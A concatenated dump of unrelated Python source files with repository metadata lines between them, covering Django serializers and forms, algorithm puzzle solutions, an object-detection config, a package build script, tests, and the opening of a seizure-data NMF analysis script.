        return has_several_logs_by_type
    def find_most_relevant_by_type(self):
        """For each issue type, track its best-scoring hit and accumulate its score.

        The result is cached on the instance after the first call.
        """
        if self.scores_by_issue_type is not None:
            return self.scores_by_issue_type
        self.scores_by_issue_type = {}
        for log, es_results in self.all_results:
            for hit in es_results:
                issue_type = hit["_source"]["issue_type"]
                if issue_type not in self.scores_by_issue_type:
                    self.scores_by_issue_type[issue_type] = {
                        "mrHit": hit,
                        "compared_log": log,
                        "score": 0}
                issue_type_item = self.scores_by_issue_type[issue_type]
                if hit["_score"] > issue_type_item["mrHit"]["_score"]:
                    self.scores_by_issue_type[issue_type]["mrHit"] = hit
                    self.scores_by_issue_type[issue_type]["compared_log"] = log
            for idx, hit in enumerate(es_results):
                issue_type = hit["_source"]["issue_type"]
                self.scores_by_issue_type[issue_type]["score"] +=\
                    (hit["normalized_score"] / self.total_normalized)
        return self.scores_by_issue_type
    def _calculate_score(self):
        """Return the accumulated normalized score per issue type."""
        scores_by_issue_type = self.find_most_relevant_by_type()
        return dict([(item, scores_by_issue_type[item]["score"]) for item in scores_by_issue_type])
    def _calculate_place(self):
        """Return 1/rank per issue type, ranked by descending score."""
        scores_by_issue_type = self._calculate_score()
        place_by_issue_type = {}
        for idx, issue_type_item in enumerate(sorted(scores_by_issue_type.items(),
                                                     key=lambda x: x[1],
                                                     reverse=True)):
            place_by_issue_type[issue_type_item[0]] = 1 / (1 + idx)
        return place_by_issue_type
    def _calculate_max_score_and_pos(self, return_val_name="max_score"):
        """Return per issue type either its max normalized score or 1/(pos of it)."""
        max_scores_by_issue_type = {}
        for log, es_results in self.all_results:
            for idx, hit in enumerate(es_results):
                issue_type = hit["_source"]["issue_type"]
                if issue_type not in max_scores_by_issue_type or\
                        hit["normalized_score"] > max_scores_by_issue_type[issue_type]["max_score"]:
                    max_scores_by_issue_type[issue_type] = {"max_score": hit["normalized_score"],
                                                            "max_score_pos": 1 / (1 + idx), }
        return dict([(item, max_scores_by_issue_type[item][return_val_name])
                    for item in max_scores_by_issue_type])
    def _calculate_min_score_and_pos(self, return_val_name="min_score"):
        """Return per issue type either its min normalized score or 1/(pos of it)."""
        min_scores_by_issue_type = {}
        for log, es_results in self.all_results:
            for idx, hit in enumerate(es_results):
                issue_type = hit["_source"]["issue_type"]
                if issue_type not in min_scores_by_issue_type or\
                        hit["normalized_score"] < min_scores_by_issue_type[issue_type]["min_score"]:
                    min_scores_by_issue_type[issue_type] = {"min_score": hit["normalized_score"],
                                                            "min_score_pos": 1 / (1 + idx), }
        return dict([(item, min_scores_by_issue_type[item][return_val_name])
                    for item in min_scores_by_issue_type])
    def _calculate_percent_count_items_and_mean(self, return_val_name="mean_score", scaled=False):
        """Return per issue type its mean normalized score or its share of all hits.

        NOTE(review): the ``scaled`` parameter is currently unused here.
        """
        cnt_items_by_issue_type = {}
        cnt_items_glob = 0
        for log, es_results in self.all_results:
            cnt_items_glob += len(es_results)
            for idx, hit in enumerate(es_results):
                issue_type = hit["_source"]["issue_type"]
                if issue_type not in cnt_items_by_issue_type:
                    cnt_items_by_issue_type[issue_type] = {"mean_score": 0,
                                                           "cnt_items_percent": 0, }
                cnt_items_by_issue_type[issue_type]["cnt_items_percent"] += 1
                cnt_items_by_issue_type[issue_type]["mean_score"] += hit["normalized_score"]
        for issue_type in cnt_items_by_issue_type:
            # turn the accumulated sums into mean score and global share
            cnt_items_by_issue_type[issue_type]["mean_score"] /=\
                cnt_items_by_issue_type[issue_type]["cnt_items_percent"]
            cnt_items_by_issue_type[issue_type]["cnt_items_percent"] /= cnt_items_glob
        return dict([(item, cnt_items_by_issue_type[item][return_val_name])
                    for item in cnt_items_by_issue_type])
    def normalize_results(self, all_elastic_results):
        """Scale every hit's _score by the global max and copy config onto hits.

        Also accumulates ``self.total_normalized`` (sum of normalized scores)
        and flattens each response to its hits list.
        """
        all_results = []
        max_score = 0
        self.total_normalized = 0
        for log, es_results in all_elastic_results:
            for hit in es_results["hits"]["hits"]:
                max_score = max(max_score, hit["_score"])
        for log, es_results in all_elastic_results:
            for hit in es_results["hits"]["hits"]:
                hit["normalized_score"] = hit["_score"] / max_score
                self.total_normalized += hit["normalized_score"]
                for config_field in self.config:
                    hit[config_field] = self.config[config_field]
            all_results.append((log, es_results["hits"]["hits"]))
        return all_results
    def _calculate_similarity_percent(self, field_name="message"):
        """Cosine similarity between the queried log and the most relevant hit."""
        scores_by_issue_type = self.find_most_relevant_by_type()
        rearranged_items = []
        for issue_type in scores_by_issue_type:
            rearranged_items.append((issue_type,
                                     scores_by_issue_type[issue_type]["compared_log"],
                                     scores_by_issue_type[issue_type]["mrHit"]))
        similarity_percent_by_type, sim_field_dict =\
            self._calculate_field_similarity(rearranged_items,
                                             field_name,
                                             for_filter=False)
        return similarity_percent_by_type
    @utils.ignore_warnings
    def gather_features_info(self):
        """Gather all features from feature_ids for a test item"""
        gathered_data = []
        issue_type_names = []
        issue_type_by_index = {}
        try:
            issue_types = self.find_most_relevant_by_type()
            for idx, issue_type in enumerate(issue_types):
                gathered_data.append([])
                issue_type_by_index[issue_type] = idx
                issue_type_names.append(issue_type)
            for feature in self.feature_ids:
                func, args = self.feature_functions[feature]
                result = func(**args)
                for issue_type in result:
                    gathered_data[issue_type_by_index[issue_type]].append(round(result[issue_type], 3))
        except Exception as err:
            logger.error("Errors in boosting features calculation")
            logger.error(err)
        return gathered_data, issue_type_names
| 2.015625 | 2 |
src/leetcode_326_power_of_three.py | sungho-joo/leetcode2github | 0 | 12772922 | # @l2g 326 python3
# [326] Power of Three
# Difficulty: Easy
# https://leetcode.com/problems/power-of-three
#
# Given an integer n, return true if it is a power of three. Otherwise, return false.
# An integer n is a power of three, if there exists an integer x such that n == 3x.
#
# Example 1:
# Input: n = 27
# Output: true
# Example 2:
# Input: n = 0
# Output: false
# Example 3:
# Input: n = 9
# Output: true
# Example 4:
# Input: n = 45
# Output: false
#
#
# Constraints:
#
# -2^31 <= n <= 2^31 - 1
#
#
# Follow up: Could you solve it without loops/recursion?
class Solution:
    def isPowerOfThree(self, n: int) -> bool:
        """Return True iff ``n == 3**x`` for some integer ``x >= 0``."""
        if n <= 0:
            return False
        # repeatedly strip factors of 3; a power of three reduces to exactly 1
        while n % 3 == 0:
            n //= 3
        return n == 1
if __name__ == "__main__":
import os
import pytest
pytest.main([os.path.join("tests", "test_326.py")])
| 4.28125 | 4 |
testing/CinemaBaseTest.py | JonasLukasczyk/workbench | 0 | 12772923 | <reponame>JonasLukasczyk/workbench
import unittest
import numpy
import os
import matplotlib.pyplot as plt
from matplotlib.testing.compare import compare_images
class CinemaBaseTest(unittest.TestCase):
    """Base test case providing gold/scratch directories and image comparison."""

    gold = "testing/gold"        # directory holding reference (gold) images
    scratch = "testing/scratch"  # directory for images produced by tests

    def setUp(self):
        # ensure the scratch directory exists; exist_ok makes this idempotent
        # (replaces the old try/except-OSError-pass pattern)
        os.makedirs(CinemaBaseTest.scratch, exist_ok=True)
        print("Running test: {}".format(self._testMethodName))

    def compare(self, a, b):
        """Return True when images *a* and *b* match within tolerance 1."""
        return compare_images(a, b, 1) is None

    def test_cinema_image_compare(self):
        # a gold image compared against itself must always match
        result = self.compare(os.path.join(CinemaBaseTest.gold, "base", "000.png"),
                              os.path.join(CinemaBaseTest.gold, "base", "000.png"))
        self.assertTrue(result)
| 2.484375 | 2 |
com/LimePencil/Q11866/Main.py | LimePencil/baekjoonProblems | 2 | 12772924 | import sys
from collections import deque
# Josephus problem (BOJ 11866): remove every k-th person from a circle of n.
n, k = list(map(int, sys.stdin.readline().strip("\n").split(" ")))
circle = deque(range(1, n + 1))
order = []
for _ in range(n):
    # advance past k-1 people (deque.rotate runs in C), then remove the k-th
    circle.rotate(-(k - 1))
    order.append(circle.popleft())
print("<" + ", ".join(str(x) for x in order) + ">")
| 3.34375 | 3 |
backend/cukiernia/serializers.py | MatMark/ZIwG | 3 | 12772925 | <filename>backend/cukiernia/serializers.py
from django.contrib.auth.models import User, Group
from rest_framework import serializers
from .models import Product, ProductPhoto, TextBox, ComboBox, ComboBoxValue, OrderStatus, Order, Decoration, Delivery
from .models import Calendar, Category, Carousel, CarouselPhoto, RelatedProductJunction, InstantRetail, OnDemandRetail
class UserSerializer(serializers.HyperlinkedModelSerializer):
    '''
    Serializer for the built-in Django User model.
    '''
    class Meta:
        model = User
        fields = ['url', 'username', 'email', 'groups']
class GroupSerializer(serializers.HyperlinkedModelSerializer):
    '''
    Serializer for the built-in Django Group model.
    '''
    class Meta:
        model = Group
        fields = ['url', 'name']
class CustomUserSerializer(serializers.ModelSerializer):
    """
    Serializer that creates users with a properly hashed password.
    Currently unused in preference of the below.
    """
    email = serializers.EmailField(
        required=True
    )
    username = serializers.CharField()
    password = serializers.CharField(min_length=8, write_only=True)

    class Meta:
        model = User
        fields = ('email', 'username', 'password')
        # BUG FIX: the key had been mangled to 'write_<PASSWORD>'; the DRF
        # option is 'write_only', which keeps the password out of responses.
        extra_kwargs = {'password': {'write_only': True}}

    def create(self, validated_data):
        password = validated_data.pop('password', None)
        # as long as the fields are the same, we can just use this
        instance = self.Meta.model(**validated_data)
        if password is not None:
            # hash via set_password -- never store the raw password
            instance.set_password(password)
        instance.save()
        return instance
class ProductSerializer(serializers.ModelSerializer):
    """Serializer for the Product model."""
    class Meta:
        model = Product
        fields = ['id', 'code', 'price', 'name_pl', 'name_en', 'product_description_pl',
                  'product_description_en', 'category', 'recommended']
class InstantRetailSerializer(serializers.ModelSerializer):
    """Serializer for products available from stock."""
    class Meta:
        model = InstantRetail
        fields = ['id', 'product', 'quantity_available']
class OnDemandRetailSerializer(serializers.ModelSerializer):
    """Serializer for products made to order."""
    class Meta:
        model = OnDemandRetail
        fields = ['id', 'product', 'production_time']
class RelatedProductJunctionSerializer(serializers.ModelSerializer):
    """Serializer for the product-to-related-product junction."""
    class Meta:
        model = RelatedProductJunction
        fields = ['id', 'related']
class ProductPhotoSerializer(serializers.ModelSerializer):
    """Serializer for product photos."""
    class Meta:
        model = ProductPhoto
        fields = ['id', 'product', 'main_photo', 'url']
class TextBoxSerializer(serializers.ModelSerializer):
    """Serializer for free-text customisation fields of a product."""
    class Meta:
        model = TextBox
        fields = ['id', 'name_pl', 'name_en', 'product', 'is_required', 'max_length']
class ComboBoxSerializer(serializers.ModelSerializer):
    """Serializer for single-choice customisation fields of a product."""
    class Meta:
        model = ComboBox
        fields = ['id', 'name_pl', 'name_en', 'product', 'is_required']
class CalendarSerializer(serializers.ModelSerializer):
    """Serializer for date-pick customisation fields of a product."""
    # BUG FIX: ``model``/``fields`` were plain class attributes; DRF only reads
    # them from an inner ``Meta`` class, so the serializer had no configuration.
    class Meta:
        model = Calendar
        fields = ['id', 'name_pl', 'name_en', 'is_required', 'product']
class ComboBoxValueSerializer(serializers.ModelSerializer):
    """Serializer for selectable values of a ComboBox."""
    class Meta:
        model = ComboBoxValue
        fields = ['id', 'text_en', 'text_pl', 'combo_box', 'price_factor']
class CategorySerializer(serializers.ModelSerializer):
    """Serializer for product categories."""
    class Meta:
        model = Category
        fields = ['id', 'name_pl', 'name_en']
class CarouselSerializer(serializers.ModelSerializer):
    """Serializer for the homepage carousel toggle."""
    class Meta:
        model = Carousel
        fields = ['id', 'enabled']
class CarouselPhotoSerializer(serializers.ModelSerializer):
    """Serializer for photos shown in the carousel."""
    class Meta:
        model = CarouselPhoto
        fields = ['id', 'url']
class OrderSerializer(serializers.ModelSerializer):
    """Serializer for customer orders."""
    class Meta:
        model = Order
        fields = ['id', 'order_date', 'delivery_date', 'status', 'street', 'postcode',
                  'city', 'courier_note', 'dealer_note', 'delivery', 'price', 'products', 'user']
class DeliverySerializer(serializers.ModelSerializer):
    """Serializer for delivery methods."""
    class Meta:
        model= Delivery
        fields = ['id', 'name_pl', 'name_en', 'price']
class OrderStatusSerializer(serializers.ModelSerializer):
    """Serializer for order status values."""
    class Meta:
        model= OrderStatus
        fields = ['id', 'name_pl', 'name_en']
class DecorationSerializer(serializers.ModelSerializer):
    """Serializer for per-order product decorations."""
    class Meta:
        model = Decoration
        fields = ['id', 'name_en', 'name_pl', 'value_pl', 'value_en', 'order', 'product', 'price']
cloudpathlib/local/__init__.py | kabirkhan/cloudpathlib | 128 | 12772926 | <filename>cloudpathlib/local/__init__.py
"""This module implements "Local" classes that mimic their associated `cloudpathlib` non-local
counterparts but use the local filesystem in place of cloud storage. They can be used as drop-in
replacements, with the intent that you can use them as mock or monkepatch substitutes in your
tests. See ["Testing code that uses cloudpathlib"](../../testing_mocked_cloudpathlib/) for usage
examples.
"""
from .implementations import (
local_azure_blob_implementation,
LocalAzureBlobClient,
LocalAzureBlobPath,
local_gs_implementation,
LocalGSClient,
LocalGSPath,
local_s3_implementation,
LocalS3Client,
LocalS3Path,
)
from .localclient import LocalClient
from .localpath import LocalPath
__all__ = [
"local_azure_blob_implementation",
"LocalAzureBlobClient",
"LocalAzureBlobPath",
"LocalClient",
"local_gs_implementation",
"LocalGSClient",
"LocalGSPath",
"LocalPath",
"local_s3_implementation",
"LocalS3Client",
"LocalS3Path",
]
| 2.28125 | 2 |
lib/base/framework.py | dromero1452/shellsploit-framework | 2 | 12772927 | <gh_stars>1-10
from lib.core.base import Base
from lib.payloads.shellcode import Shellcode
class ShellsploitFramework(Base, Shellcode):
    """Facade combining the Base core with the Shellcode payload helpers."""
    def __init__(self):
        # BUG FIX: ``super(Base, self).__init__()`` / ``super(Shellcode,
        # self).__init__()`` look up the class *after* the given one in the
        # MRO, so neither Base.__init__ nor Shellcode.__init__ was ever run.
        # Initialise both parents explicitly instead.
        Base.__init__(self)
        Shellcode.__init__(self)
| 1.835938 | 2 |
tests/test_case_style.py | xkumiyu/case-style-changer | 2 | 12772928 | import pytest
from case_style_changer.case_style import CamelCase
from case_style_changer.case_style import CapitalCase
from case_style_changer.case_style import Case
from case_style_changer.case_style import ConstantCase
from case_style_changer.case_style import KebabCase
from case_style_changer.case_style import PascalCase
from case_style_changer.case_style import SentenceCase
from case_style_changer.case_style import SnakeCase
@pytest.mark.parametrize(
    "string, expected",
    [
        ("camel", CamelCase),
        ("pascal", PascalCase),
        ("snake", SnakeCase),
        ("constant", ConstantCase),
        ("kebab", KebabCase),
        ("sentence", SentenceCase),
        ("capital", CapitalCase),
    ],
)
def test_from_string(string, expected):
    """Each case-style name string maps to its corresponding Case subclass."""
    case = Case.from_string(string)
    assert case == expected
def test_from_string_gives_error():
    """An unknown (empty) case-style name raises an exception."""
    with pytest.raises(Exception):
        Case.from_string("")
def test_no_duplicates_in_the_available_list():
    """The list of available case names must contain no duplicates."""
    available_list = Case.available_list()
    # a set collapses duplicates, so equal lengths <=> all entries unique
    assert len(available_list) == len(set(available_list))
| 2.546875 | 3 |
src/wai/annotations/core/component/_ProcessorComponent.py | waikato-ufdl/wai-annotations-core | 0 | 12772929 | from abc import ABC
from ..stream import StreamProcessor, InputElementType, OutputElementType
from ._Component import Component
class ProcessorComponent(
    StreamProcessor[InputElementType, OutputElementType],
    Component,
    ABC
):
    """
    Base class for plugin ISPs.
    """
    # NOTE(review): "ISP" is not expanded anywhere in this file -- presumably
    # an inline stream-processor plugin; confirm against the project docs.
    pass
| 1.789063 | 2 |
kasuga/wordholder.py | hashimom/kasuga | 3 | 12772930 | <reponame>hashimom/kasuga
# -*- coding: utf-8 -*-
"""
Copyright (c) 2018-2019 <NAME> <<EMAIL>>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import csv
import numpy as np
import tensorflow as tf
WORD_TYPE_LIST = [
[
"形容詞",
"連体詞",
"副詞",
"判定詞",
"助動詞",
"接続詞",
"指示詞",
"感動詞",
"名詞",
"動詞",
"助詞",
"接頭辞",
"接尾辞",
"特殊",
"未定義語"
],
[
"形容詞",
"連体詞",
"副詞",
"判定詞",
"助動詞",
"接続詞",
"名詞形態指示詞",
"連体詞形態指示詞",
"副詞形態指示詞",
"感動詞",
"普通名詞",
"副詞的名詞",
"形式名詞",
"固有名詞",
"組織名",
"地名",
"人名",
"サ変名詞",
"数詞",
"時相名詞",
"動詞",
"格助詞",
"副助詞",
"接続助詞",
"終助詞",
"名詞接頭辞",
"動詞接頭辞",
"イ形容詞接頭辞",
"ナ形容詞接頭辞",
"名詞性名詞接尾辞",
"名詞性述語接尾辞",
"名詞性名詞助数辞",
"名詞性特殊接尾辞",
"形容詞性述語接尾辞",
"形容詞性名詞接尾辞",
"動詞性接尾辞",
"句点",
"読点",
"括弧始",
"括弧終",
"記号",
"空白",
"カタカナ",
"アルファベット",
"その他"
]
]
WORD_ID_BIT_NUM = 16
class WordHolder:
    """Maintains a word -> (id, POS types) table and encodes words as vectors.

    A word's feature vector is ``WORD_ID_BIT_NUM`` bits of its id (least
    significant bit first), followed by one-hot encodings of its coarse
    (type1) and fine-grained (type2) part-of-speech categories.
    """

    def __init__(self, list_file=None):
        self.word_list = {}
        self.type1_one_hot = np.eye(len(WORD_TYPE_LIST[0]))
        self.type2_one_hot = np.eye(len(WORD_TYPE_LIST[1]))
        # optionally preload an existing word list (CSV: surface,id,type1,type2)
        if list_file is not None:
            with open(list_file, "r", encoding="utf-8") as f:
                reader = csv.reader(f, delimiter=",")
                for row in reader:
                    self.word_list[row[0]] = {"id": row[1], "type1": row[2], "type2": row[3]}

    def __call__(self, surface):
        """Return the feature vector for an already-registered surface form."""
        word_id = int(self.word_list[surface]["id"])
        # id encoded as WORD_ID_BIT_NUM bits, least-significant bit first
        id_ary = [float((word_id >> i) & 1) for i in range(WORD_ID_BIT_NUM)]
        ret_ary = np.array(id_ary, dtype="float")
        ret_ary = np.hstack((ret_ary, self.type1_one_hot[int(self.word_list[surface]["type1"])]))
        ret_ary = np.hstack((ret_ary, self.type2_one_hot[int(self.word_list[surface]["type2"])]))
        return ret_ary

    def regist(self, surface, type1, type2):
        """Register *surface* with a random id and its POS category indices."""
        if surface not in self.word_list:
            # BUG FIX: the upper bound was 65535 (exclusive in np.random.randint),
            # so the 16-bit value 65535 could never be assigned; derive the
            # range from WORD_ID_BIT_NUM instead.
            word_id = np.random.randint(0, 1 << WORD_ID_BIT_NUM)
            if type2 != "*":
                self.word_list[surface] = {"id": word_id,
                                           "type1": WORD_TYPE_LIST[0].index(type1),
                                           "type2": WORD_TYPE_LIST[1].index(type2)}
            else:
                # no fine-grained POS available: reuse the coarse index for type2
                self.word_list[surface] = {"id": word_id,
                                           "type1": WORD_TYPE_LIST[0].index(type1),
                                           "type2": WORD_TYPE_LIST[0].index(type1)}

    def save(self, filename):
        """Write the word list to *filename* as CSV (surface,id,type1,type2)."""
        with open(filename, 'w', encoding="utf-8") as f:
            writer = csv.writer(f, lineterminator='\n')
            for surface, entry in self.word_list.items():
                writer.writerow([surface, entry["id"], entry["type1"], entry["type2"]])

    @staticmethod
    def type_list_cnt():
        """Return the sizes of the coarse and fine POS category lists."""
        return [len(WORD_TYPE_LIST[0]), len(WORD_TYPE_LIST[1])]
| 1.078125 | 1 |
planet_express.py | srobo/kit-packages | 0 | 12772931 | <reponame>srobo/kit-packages
"""Our crew is replaceable, your package isn't!"""
import subprocess
from pathlib import Path
from shutil import move
from typing import List
# NB: These are manually dependency sorted!
# TODO: Tree shaking or DAG or equivalent
PACKAGES: List[str] = [
    "python-dbus-next",
    "python-gmqtt",
    "python-pyquaternion",
    "python-zoloto",
    "udiskie-minimal",
    "python-astoria",
    "python-j5",
    "python-j5-zoloto",
    "python-sr-robot3",
    "astoria-udiskie",
    "srobo-kit",
]
# Package sources are expected as subdirectories of the working directory;
# finished *.pkg.tar.* artifacts are collected into BUILD_PATH.
CURR_PATH = Path(".")
BUILD_PATH = Path("/tmp/build")
def build_package(name: str) -> None:
    """Build one Arch package with makepkg and collect its artifacts.

    Expects ./<name>/PKGBUILD to exist; every produced *.pkg.tar.* file
    is moved into BUILD_PATH.

    Raises:
        subprocess.CalledProcessError: if makepkg exits non-zero.
        AssertionError: if the package directory, PKGBUILD, or output
            packages are missing.
    """
    package_dir = CURR_PATH.joinpath(name)
    assert package_dir.exists(), f"missing package directory: {package_dir}"
    assert package_dir.joinpath("PKGBUILD").exists(), f"missing PKGBUILD in {package_dir}"
    print("\tFound directory and PKGBUILD")

    # BUG FIX: check=True — previously a failed makepkg was silently ignored
    # and the build carried on with stale/absent artifacts.
    subprocess.run(["makepkg", "-si", "--noconfirm"], cwd=package_dir, check=True)

    package_files = list(package_dir.glob("*.pkg.tar.*"))
    assert len(package_files) != 0, "makepkg produced no packages"
    print(f"\t{len(package_files)} packages have been produced.")

    for pkg in package_files:
        move(pkg, BUILD_PATH / pkg.name)
if __name__ == "__main__":
    # Entry point: build every package in the (manually dependency-sorted) list.
    print("PLANET EXPRESS PACKAGE DELIVERY")
    print(__doc__)
    print("")
    for package in PACKAGES:
        print(f"Building {package}")
        build_package(package)
| 2.421875 | 2 |
built-in/PyTorch/Official/cv/image_object_detection/YoloV3_ID1790_for_PyTorch/configs/legacy_1.x/mask_rcnn_r50_fpn_1x_coco_v1.py | Ascend/modelzoo | 12 | 12772932 | # Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Legacy (mmdetection v1.x-compatible) Mask R-CNN R-50 FPN 1x COCO config:
# swaps in the v1.x anchor generator, box coder and RoIAlign settings so
# results match models trained with mmdetection 1.x.
_base_ = [
    '../_base_/models/mask_rcnn_r50_fpn.py',
    '../_base_/datasets/coco_instance.py',
    '../_base_/schedules/schedule_1x.py', '../_base_/default_runtime.py'
]
model = dict(
    rpn_head=dict(
        # v1.x anchors were generated with a 0.5 center offset.
        anchor_generator=dict(type='LegacyAnchorGenerator', center_offset=0.5),
        bbox_coder=dict(type='LegacyDeltaXYWHBBoxCoder'),
        loss_bbox=dict(type='SmoothL1Loss', beta=1.0 / 9.0, loss_weight=1.0)),
    roi_head=dict(
        bbox_roi_extractor=dict(
            type='SingleRoIExtractor',
            roi_layer=dict(
                type='RoIAlign',
                output_size=7,
                sampling_ratio=2,
                # aligned=False reproduces the v1.x RoIAlign behavior.
                aligned=False)),
        mask_roi_extractor=dict(
            type='SingleRoIExtractor',
            roi_layer=dict(
                type='RoIAlign',
                output_size=14,
                sampling_ratio=2,
                aligned=False)),
        bbox_head=dict(
            bbox_coder=dict(type='LegacyDeltaXYWHBBoxCoder'),
            loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0))))
# model training and testing settings
train_cfg = dict(
    rpn_proposal=dict(nms_post=2000, max_num=2000),
    rcnn=dict(assigner=dict(match_low_quality=True)))
| 1.320313 | 1 |
tests/test_issues/test_issue_8.py | hsolbrig/pyjsg | 3 | 12772933 |
import unittest
class Issue8TestCase(unittest.TestCase):
    """Regression test for issue #8: isinstance checks on JSGString subclasses."""

    def test_none_as_string_instance(self):
        from pyjsg.jsglib import JSGString, JSGPattern

        class S(JSGString):
            pattern = JSGPattern(r'[a-zA-Z]+')

        # Only non-empty, purely alphabetic strings match the pattern;
        # in particular, None must never be considered an instance.
        self.assertTrue(isinstance('abc', S))
        for non_member in ('abc1', '', None):
            self.assertFalse(isinstance(non_member, S))
if __name__ == '__main__':
    # Allow running this test module directly.
    unittest.main()
| 2.953125 | 3 |
physionet-django/search/forms.py | Lucas-Mc/physionet-build | 36 | 12772934 | from django import forms
class TopicSearchForm(forms.Form):
    """Free-text topic search box (optional, at most 50 characters)."""
    topic = forms.CharField(max_length=50, required=False, label='')
class ProjectOrderForm(forms.Form):
    """Selector for how project search results are ordered."""

    # (value, label) pairs; each value encodes "<field>-<direction>".
    ORDER_CHOICES = (
        ('relevance-desc', 'Relevance'),
        ('publish_datetime-desc', 'Latest'),
        ('publish_datetime-asc', 'Oldest'),
        ('title-asc', 'Title (Asc.)'),
        ('title-desc', 'Title (Desc.)'),
        ('main_storage_size-asc', 'Size (Asc.)'),
        ('main_storage_size-desc', 'Size (Desc.)'),
    )
    orderby = forms.ChoiceField(choices=ORDER_CHOICES, label='')

    def clean_orderby(self):
        # BUG FIX: Django calls clean_<fieldname>; the previous method was
        # named "clean_order_by", which never matched the "orderby" field,
        # so it was dead code.  A field cleaner must return the value,
        # otherwise cleaned_data['orderby'] would be replaced with None.
        return self.cleaned_data['orderby']
class ProjectTypeForm(forms.Form):
    """Checkbox filter for which kinds of projects to include."""
    # (database value, display label) pairs for the project resource types.
    PROJECT_TYPES = (
        (0, 'Data'),
        (1, 'Software'),
        (2, 'Challenge'),
        (3, 'Model'),
    )
    types = forms.MultipleChoiceField(widget=forms.CheckboxSelectMultiple,
                                      choices=PROJECT_TYPES, label='')
| 2.296875 | 2 |
code/04-preictal_nmf.py | akashpattnaik/pre-ictal-similarity | 0 | 12772935 | '''
This script plots spectrograms for pre-ictal periods.
Then, it uses NMF to find subgraphs and expressions for pre-ictal periods.
Finally, it calculates states as the subgraph with maximal expression at each time point
and calculates the dissimilarity between states.
Inputs:
target-electrodes-{mode}.mat
bandpower-windows-pre-sz-{mode}.mat
Outputs:
'''
# %%
# %load_ext autoreload
# %autoreload 2
# Imports and environment setup
import numpy as np
import sys
import os
import pandas as pd
import json
from scipy.io import loadmat
import matplotlib.pyplot as plt
from tqdm import tqdm
from os.path import join as ospj
from scipy.stats import zscore
import time
from kneed import KneeLocator
sys.path.append('tools')
from plot_spectrogram import plot_spectrogram
from movmean import movmean
from pull_sz_starts import pull_sz_starts
from pull_patient_localization import pull_patient_localization
from mpl_toolkits.axes_grid1 import make_axes_locatable
from time2ind import time2ind
from fastdtw import fastdtw
from scipy.spatial.distance import euclidean
from sklearn.decomposition import NMF
from sklearn.metrics.cluster import adjusted_rand_score
import warnings
from sklearn.exceptions import ConvergenceWarning
warnings.filterwarnings(action='ignore', category=ConvergenceWarning)
# Get paths from config file and metadata
with open("config.json") as f:
    config = json.load(f)
repo_path = config['repositoryPath']
metadata_path = config['metadataPath']
palette = config['lightColors']
DTW_FLAG = config['flags']["DTW_FLAG"]
# Electrode selection and frequency-band options (see config.json).
electrodes_opt = config['electrodes']
band_opt = config['bands']
data_path = ospj(repo_path, 'data')
figure_path = ospj(repo_path, 'figures')
metadata_fname = ospj(metadata_path, "DATA_MASTER.json")
with open(metadata_fname) as f:
    metadata = json.load(f)['PATIENTS']
patient_cohort = pd.read_excel(ospj(data_path, "patient_cohort.xlsx"))
# flags
SAVE_PLOT = True
NMF_OPT_FLAG = True
SUBJ_LEVEL = False
# Pre-ictal window length (s); lead seizures must be separated from the
# previous seizure by this window plus a 15 minute buffer.
FIXED_PREICTAL_SEC = 60 * config['preictal_window_min']
LEAD_SZ_WINDOW_SEC = (FIXED_PREICTAL_SEC + 60 * 15) # 15 min buffer
# %%
patient_localization_mat = loadmat(ospj(metadata_path, 'patient_localization_final.mat'))['patient_localization']
patients, labels, ignore, resect, gm_wm, coords, region, soz = pull_patient_localization(ospj(metadata_path, 'patient_localization_final.mat'))
# For each non-ignored patient: load pre-ictal bandpower, drop seizures with
# short inter-seizure intervals, then fit NMF per lead seizure to extract
# subgraphs (H) and their time-varying expression (W).
for _, row in patient_cohort.iterrows():
    if row['Ignore']:
        continue
    pt = row["Patient"]
    print("Calculating pre-ictal NMF for {}".format(pt))
    pt_data_path = ospj(data_path, pt)
    pt_figure_path = ospj(figure_path, pt)
    if not os.path.exists(pt_figure_path):
        os.makedirs(pt_figure_path)
    # pull and format electrode metadata (also validates the file exists)
    electrodes_mat = loadmat(ospj(pt_data_path, "selected_electrodes_elec-{}.mat".format(electrodes_opt)))
    target_electrode_region_inds = electrodes_mat['targetElectrodesRegionInds'][0]
    pt_index = patients.index(pt)
    sz_starts = pull_sz_starts(pt, metadata)
    # get bandpower features from the pre-ictal period
    df = pd.read_pickle(ospj(pt_data_path, "bandpower_elec-{}_period-preictal.pkl".format(electrodes_opt)))
    if band_opt == "all":
        # keep every narrow band: drop broadband columns and the seizure id
        bandpower_data = df.filter(regex=("^((?!broad).)*$"), axis=1)
        bandpower_data = bandpower_data.drop(['Seizure id'], axis=1)
    elif band_opt == "broad":
        bandpower_data = df.filter(regex=("broad"), axis=1)
    else:
        # BUG FIX: this branch previously printed a message and evaluated the
        # bare name `exit` (a no-op, not a call), leaving bandpower_data
        # undefined and crashing later with a NameError.  Fail fast instead.
        raise ValueError("Band configuration not given properly: {}".format(band_opt))
    sz_id = np.squeeze(df['Seizure id'])
    t_sec = np.array(df.index / np.timedelta64(1, 's'))
    # keep only lead seizures: those preceded by a long enough gap
